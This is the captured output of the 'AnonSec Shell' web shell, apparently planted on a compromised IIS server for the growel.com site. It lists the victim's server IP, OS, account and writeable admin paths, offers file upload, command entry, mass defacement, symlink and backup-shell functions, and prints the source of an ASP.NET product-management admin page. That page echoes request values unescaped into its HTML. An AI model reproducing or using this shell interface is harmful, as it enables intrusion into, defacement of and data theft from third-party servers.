. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs//GrowelAdmin/ManageSubProducts.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/GrowelAdmin/Admin.Master" AutoEventWireup="true" CodeBehind="ManageSubProducts.aspx.cs" Inherits="GrowelWeb.GrowelAdmin.ManageSubProducts" %>

<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">

    <script>
        $(function () {


            $("#sortable").sortable();
            $("#sortable").disableSelection();

            $("#sortable1").sortable();
            $("#sortable1").disableSelection();

            $("#order").click(function () {

                saveOrder();


            });

            $("#order1").click(function () {

                saveOrder1();


            });




        });

        function saveOrder() {

            $("#stat").fadeIn(100);
            $("#stat").html("Please wait");

            var selectedLanguage = new Array();
            $('#sortable .sort').each(function () {
                selectedLanguage.push($(this).attr("title"));
            });

            var bt = $("#prod").val();
            //alert(bt);
            //alert(selectedLanguage);
            $.ajax({
                url: 'sortsubproducts.aspx?pages=' + selectedLanguage + '&p=' + bt,
                dataType: "html",
                type: 'POST', //I want a type as POST
                data: "subproducts=" + selectedLanguage + "&p=" + bt,

                success: function (data) {
                    //$("#stat").html(data);
                    //  alert("New Order is saved.")
                    $("#stat").html("New Order is saved.");
                    //location.reload();
                }
            });

        }

        function saveOrder1() {

            $("#stat").fadeIn(100);
            $("#stat").html("Please wait");

            var selectedLanguage = new Array();
            $('#sortable1 .sort').each(function () {
                selectedLanguage.push($(this).attr("title"));
            });

            var bt = $("#prod1").val();
            alert(bt);
            //alert(selectedLanguage);
            $.ajax({
                url: 'sortsubproducts.aspx?pages=' + selectedLanguage + '&p=' + bt,
                dataType: "html",
                type: 'POST', //I want a type as POST
                data: "subproducts=" + selectedLanguage + "&p=" + bt,

                success: function (data) {
                    //$("#stat").html(data);
                    //  alert("New Order is saved.")
                    $("#stat").html("New Order is saved.");
                    //location.reload();
                }
            });

        }

    </script>


</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server">

     <h3>Manage Subproducts Of <%=product.Replace("-"," ") %></h3>
   <input type="hidden" name="prod" id="prod" value='<%=product %>' />
   <input type="hidden" name="prod1" id="prod1" value='<%=product %>' />

    <div class="topbutton"><a href="ManageProducts.aspx?type=<%=type %>" class="btn btn-default">&lt;&lt; Back To Products</a>
         <a href="AddSubProduct.aspx?product=<%=product %>&type=<%=type %>" class="btn btn-default">Add Subproduct</a>
    </div>

<div class="btn-danger status" visible="false" runat="server" id="status"></div>
    <div class="row">
        <div id="sortable">
    <asp:Repeater ID="dtlstproducts" runat="server">
        <ItemTemplate>
            <div class="col-md-6 thumb sort" title='<%#Eval("subproduct") %>'>
<h4><%#Eval("subproduct_displayname") %></h4>
<div>
    <a href="AddSubProduct.aspx?subproduct=<%#Eval("subproduct").ToString() %>&type=<%=type %>">View / Edit</a>
    
    <%--<a href="SubproductItems.aspx?subproduct=<%#Eval("subproduct").ToString() %>&type=<%=type %>">Manage Sub Product</a>--%>
    <a href="ManageSubProducts.aspx?product=<%#Eval("subproduct").ToString() %>&type=<%=type %>">Manage Sub Product</a>
     
    <asp:LinkButton ID="lnkdelete" runat="server" Text="Delete" OnClientClick="return confirm('Delete Sub Product? All Information Will Be Deleted.')" CommandArgument='<%#Eval("subproduct") %>' OnCommand="lnkdelete_click"></asp:LinkButton></div></div>
        </ItemTemplate>
    </asp:Repeater>
            </div>
        <br clear="all" />
        <div class="btn btn-default" id="order">Save order</div>
        <div class="clearfix" style="padding:10px;font-weight:bold;" id="stat"></div>
        </div>


    <h3>Manage Products Of &nbsp; <%=product.Replace("-"," ") %></h3>
    <div class="row">
        <div id="sortable1">
    <asp:Repeater ID="dtlstproducts1" runat="server">
        <ItemTemplate>
            <div class="col-md-6 thumb sort" title='<%#Eval("subproduct") %>'>
<h4><%#Eval("subproduct_displayname") %></h4>
<div>
    <a href="AddSubProduct.aspx?subproduct=<%#Eval("subproduct").ToString() %>&type=<%=type %>">View / Edit</a>
    
    <%--<a href="SubproductItems.aspx?subproduct=<%#Eval("subproduct").ToString() %>&type=<%=type %>">Manage Sub Product</a>--%>
    <%--<a href="ManageSubProducts.aspx?product=<%#Eval("subproduct").ToString() %>&type=<%=type %>">Manage Sub Product</a>--%>
     
    <asp:LinkButton ID="lnkdelete" runat="server" Text="Delete" OnClientClick="return confirm('Delete Sub Product? All Information Will Be Deleted.')" CommandArgument='<%#Eval("subproduct") %>' OnCommand="lnkdelete_click"></asp:LinkButton></div></div>
        </ItemTemplate>
    </asp:Repeater>
            </div>
        <br clear="all" />
        <div class="btn btn-default" id="order1">Save order</div>
        <div class="clearfix" style="padding:10px;font-weight:bold;" id="stat"></div>
        </div>



</asp:Content>


Anon7 - 2022
AnonSec Team